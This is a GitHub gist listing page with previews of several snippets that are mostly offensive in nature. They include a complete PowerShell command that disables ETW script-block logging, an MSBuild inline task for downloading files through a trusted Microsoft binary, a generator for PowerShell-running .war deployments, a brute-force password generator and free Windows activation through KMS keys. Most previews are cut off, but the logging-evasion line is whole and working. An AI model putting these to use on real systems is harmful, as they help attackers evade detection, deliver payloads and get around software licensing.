Skip to content

Instantly share code, notes, and snippets.

View rvrsh3ll's full-sized avatar

Steve Borosh rvrsh3ll

View GitHub Profile
@butageek
butageek / windows_activation.md
Last active March 26, 2024 03:17
Activate Windows for free

For Windows 10

Step 1 - Open PowerShell or Command Prompt as administrator

Step 2 - Install KMS client key

slmgr /ipk your_license_key

Replace your_license_key with following volumn license keys according to Windows Edition:

@bytecod3r
bytecod3r / msbuildapicaller.csproj
Created January 20, 2020 06:10
msbuildapicaller.csproj
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
<ParameterGroup>
<Address ParameterType="System.String" Required="true" />
<FileName ParameterType="System.String" Required="true" />
</ParameterGroup>
<Task>
<Reference Include="System" />
<Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>
@joelallouz
joelallouz / grin-miner-setup.txt
Created January 4, 2019 06:00
Grin miner install on Ubuntu 18.04.1 LTS Server - Cuda Setup
### Install, build and RUN Grin — Then stop it
## install rust and dependencies
curl https://sh.rustup.rs -sSf | sh; source $HOME/.cargo/env
sudo apt install build-essential cmake git libgit2-dev clang libncurses5-dev libncursesw5-dev zlib1g-dev pkg-config libssl-dev llvm
## pull grin
git clone https://github.com/mimblewimble/grin.git
cd grin
cargo build --release
@tandasat
tandasat / KillETW.ps1
Last active March 15, 2024 05:20
Disable ETW of the current PowerShell session
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@DCSantu2000
DCSantu2000 / pyBtuteForceIter.py
Created November 15, 2016 08:53
Python Brute Force Using Itertools Library.It allows you to make password library.This code helps you to make a password from (0 to zzzzzzzzzzzzzzzzzzzz).
###################Details#########
#A simple python brute force algarithm
#using itertools library.
#####################################
#_author_="Antu Roy"
#_year_=2015
########imports##########
@HarmJ0y
HarmJ0y / psWar.py
Created September 15, 2015 07:51
PsWar
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):